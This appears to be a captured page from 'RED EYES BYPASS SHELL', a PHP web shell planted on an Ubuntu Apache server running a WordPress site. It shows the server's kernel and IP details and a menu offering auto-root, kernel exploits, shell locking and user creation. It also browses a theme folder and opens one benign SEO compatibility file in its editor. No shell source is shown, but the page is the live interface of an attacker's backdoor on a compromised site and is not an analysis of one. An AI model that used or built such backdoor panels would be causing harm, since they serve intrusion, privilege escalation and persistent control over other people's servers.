Linux sothorn202 5.15.0-164-generic #174-Ubuntu SMP Fri Nov 14 20:25:16 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
pr /
wp-content /
themes /
Extra /
includes /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
admin
[ DIR ]
drwxr-xr-x
builder
[ DIR ]
drwxr-xr-x
ext
[ DIR ]
drwxr-xr-x
functions
[ DIR ]
drwxr-xr-x
module-customizer
[ DIR ]
drwxr-xr-x
activation.php
947
B
-rwxr-xr-x
block-editor-integration.php
2.79
KB
-rwxr-xr-x
builder-integrations.php
41.78
KB
-rwxr-xr-x
choices.php
5.12
KB
-rwxr-xr-x
core.php
56.92
KB
-rwxr-xr-x
customizer.php
125.09
KB
-rwxr-xr-x
dynamic-assets.php
1.26
KB
-rwxr-xr-x
et-social-followers.php
23.03
KB
-rwxr-xr-x
et-social-share.php
3.67
KB
-rwxr-xr-x
installation.php
248
B
-rwxr-xr-x
layouts.php
11.51
KB
-rwxr-xr-x
modules-defaults.php
13.27
KB
-rwxr-xr-x
modules.php
107.89
KB
-rwxr-xr-x
navigation.php
408
B
-rwxr-xr-x
plugins-eventon-support.php
794
B
-rwxr-xr-x
plugins-lifterlms-support.php
590
B
-rwxr-xr-x
plugins-seo-support.php
5.72
KB
-rwxr-xr-x
plugins-woocommerce-support.php
13.02
KB
-rwxr-xr-x
projects.php
5.69
KB
-rwxr-xr-x
ratings.php
5.62
KB
-rwxr-xr-x
sanitization.php
6.27
KB
-rwxr-xr-x
template-tags.php
53.39
KB
-rwxr-xr-x
theme-builder.php
2.41
KB
-rwxr-xr-x
widgets.php
51.67
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : plugins-seo-support.php
<?php // Prevent file from being loaded directly if ( ! defined( 'ABSPATH' ) ) { die( '-1' ); } if ( ! function_exists( 'is_plugin_active' ) ) { include_once( ABSPATH . 'wp-admin/includes/plugin.php' ); } /** * All In One SEO Pack Compatibility */ if ( is_plugin_active( 'all-in-one-seo-pack/all_in_one_seo_pack.php' ) || is_plugin_active( 'all-in-one-seo-pack-pro/all_in_one_seo_pack.php' ) ) { class Extra_Plugin_AIOSEP_Compat { public static $instance; protected $aioseop_options; protected $show_on_front; protected $use_static_home_info; /** * Gets the instance of the plugin */ public static function instance(){ if ( null === self::$instance ){ self::$instance = new self(); } return self::$instance; } function __construct() { $this->aioseop_options = get_option( 'aioseop_options' ); $this->show_on_front = get_option( 'show_on_front' ); $this->use_static_home_info = $this->get_plugin_option( 'aiosp_use_static_home_info' ); $filter_prefix = $this->get_plugin_filter_prefix(); add_filter( "{$filter_prefix}_title", array( $this, 'title_compat' ) ); add_filter( "{$filter_prefix}_description", array( $this, 'description_compat' ) ); add_filter( "{$filter_prefix}_keywords", array( $this, 'keywords_compat' ) ); } /** * Get plugin version. * * @since ?? * * @return string */ public function get_plugin_version() { $plugin_data = get_plugin_data( WP_PLUGIN_DIR . '/all-in-one-seo-pack/all_in_one_seo_pack.php', false ); if ( ! isset( $plugin_data['Version'] ) ) { return false; } return $plugin_data['Version']; } /** * Get plugin filter prefix. * * @since ?? * * @return string */ public function get_plugin_filter_prefix() { $filter_prefix = 'aioseo'; if ( version_compare( $this->get_plugin_version(), '4.0.0', '<' ) ) { $filter_prefix = 'aioseop'; } return $filter_prefix; } /** * Get AIOSEP option based on its key * * @param string option key * @param mixed default value * @return mixed */ function get_plugin_option( $key, $default = false ) { if ( isset( $this->aioseop_options[ $key ] ) ) { return $this->aioseop_options[ $key ]; } return $default; } /** * Assess whether current page is a page that need to be overriden by compatibility file. Known troubling condition: * - Homepage where AIESOP homepage setting is used + Extra layout is activated to be shown on the home page * * @return bool */ function use_home_compat() { return is_home() && '1' !== $this->use_static_home_info && 'layout' === $this->show_on_front; } /** * Modify title tag, filtered by known condition * * @param string existing title tag value * @return string modified title tag value */ function title_compat( $title ) { if ( $this->use_home_compat() && $this->get_plugin_option( 'aiosp_home_title' ) ) { $title = esc_attr( $this->get_plugin_option( 'aiosp_home_title' ) ); } return $title; } /** * Modify description meta tag, filtered by known condition * * @param string existing description meta tag value * @return string modified description meta tag value */ function description_compat( $description ) { if ( $this->use_home_compat() && $this->get_plugin_option( 'aiosp_home_description' ) ) { $description = esc_attr( $this->get_plugin_option( 'aiosp_home_description' ) ); } return $description; } /** * Modify keywords meta tag, filtered by known condition * * @param string existing keywords meta tag value * @return string modified keywords meta tag value */ function keywords_compat( $keywords ) { if ( $this->use_home_compat() && $this->get_plugin_option( 'aiosp_home_keywords' ) ) { $keywords = esc_attr( $this->get_plugin_option( 'aiosp_home_keywords' ) ); } return $keywords; } } /** * Initialize All In One SEO PACK compatibility class */ Extra_Plugin_AIOSEP_Compat::instance(); } /** * Only load if YOAST SEO plugin is activated */ if ( is_plugin_active( 'wordpress-seo/wp-seo.php' ) || is_plugin_active( 'wordpress-seo-premium/wp-seo-premium.php' ) ) { /** * Force YOAST SEO to use title and meta description options on Dashboard > Titles & Metas > Homepage * when Category Builder is used for homepage. * @return string */ function extra_yoast_seo_show_titledesc_options( $value, $option ) { global $pagenow; if ( is_admin() && 'admin.php' === $pagenow && isset( $_GET['page'] ) && 'wpseo_titles' === $_GET['page'] && 'layout' === $value ) { $value = 'posts'; } return $value; } add_filter( 'option_show_on_front', 'extra_yoast_seo_show_titledesc_options', 10, 2 ); /** * Get values from WPSEO_Options based on given key if current page is * homepage and category builder is used on homepage * @return string */ function extra_yoast_seo_homepage_adjustment( $option_key, $default ) { if ( class_exists( 'WPSEO_Options' ) && is_home() && 'layout' === get_option( 'show_on_front' ) ) { $all_options = WPSEO_Options::get_all(); } $value = isset( $all_options[$option_key] ) ? $all_options[$option_key] : $default; return wpseo_replace_vars( $value, array() ); } /** * Adjusting homepage's title tag * @return string */ function extra_yoast_seo_homepage_title_adjustment( $title ) { return extra_yoast_seo_homepage_adjustment( 'title-home-wpseo', $title ); } add_filter( 'wpseo_title', 'extra_yoast_seo_homepage_title_adjustment' ); /** * Adjusting homepage's meta description * @return string */ function extra_yoast_seo_homepage_meta_desc_adjustment( $desc ) { return extra_yoast_seo_homepage_adjustment( 'metadesc-home-wpseo', $desc ); } add_filter( 'wpseo_metadesc', 'extra_yoast_seo_homepage_meta_desc_adjustment' ); }
Close